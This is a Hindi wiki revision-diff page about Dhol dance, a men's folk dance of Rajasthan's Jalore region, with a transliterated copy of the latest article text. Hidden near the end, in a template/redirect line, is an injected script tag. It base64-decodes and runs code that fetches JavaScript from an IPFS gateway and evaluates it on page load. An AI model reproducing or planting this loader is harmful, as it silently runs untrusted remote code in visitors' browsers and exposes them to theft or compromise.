Difference between revisions of "ढोल नृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''ढोल नृत्य''' राजस्थान के प्रसिद्ध लोक नृत्यों में ...' के साथ नया पन्ना बनाया)
 
 
Line 5: Line 5:
 
*इस नृत्य में [[ढोल]] बजाने वाले एक मुखिया के साथ चार-पाँच लोग और होते हैं।
 
*इस नृत्य में [[ढोल]] बजाने वाले एक मुखिया के साथ चार-पाँच लोग और होते हैं।
 
*ढोल को स्थानीय 'थाकना' शैली में बजाया जाता है।
 
*ढोल को स्थानीय 'थाकना' शैली में बजाया जाता है।
*'थाकना' के बाद विभिन्न मुद्राओं व रूपों में लोग लयबद्ध नृत्य में सम्मिलि हो जाते हैं।
+
*'थाकना' के बाद विभिन्न मुद्राओं व रूपों में सजे पुरुष लयबद्ध तरीके से इस नृत्य में सम्मिलित होते हैं।
*राजस्थान में ढोली, सरगड़ा, माली तथा [[भील]] जाति के लोकवादक तथा गायक इसमें विशेष दक्ष माने जाते हैं।
+
*[[राजस्थान]] में ढोली, सरगड़ा, माली तथा [[भील]] जाति के लोकवादक तथा गायक इसमें विशेष दक्ष माने जाते हैं।
  
  

Latest revision as of 13:50, 8 April 2014

dhol nrity rajasthan ke prasiddh lok nrityoan mean se ek hai. yah marusthal kshetr ka prasiddh nrity hai, jisaka prachalan jalaur mean hai.

  • yah nrity matr purushoan ke dvara kiya jata hai, mahilaean isamean bhag nahian leti haian.
  • dhol nrity ek samarohik nrity hai, jise vivah adi ke dinoan mean utsah ke sath kiya jata hai.
  • is nrity mean dhol bajane vale ek mukhiya ke sath char-paanch log aur hote haian.
  • dhol ko sthaniy 'thakana' shaili mean bajaya jata hai.
  • 'thakana' ke bad vibhinn mudraoan v roopoan mean saje purush layabaddh tarike se is nrity mean sammilit hote haian.
  • rajasthan mean dholi, sarag da, mali tatha bhil jati ke lokavadak tatha gayak isamean vishesh daksh mane jate haian.


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh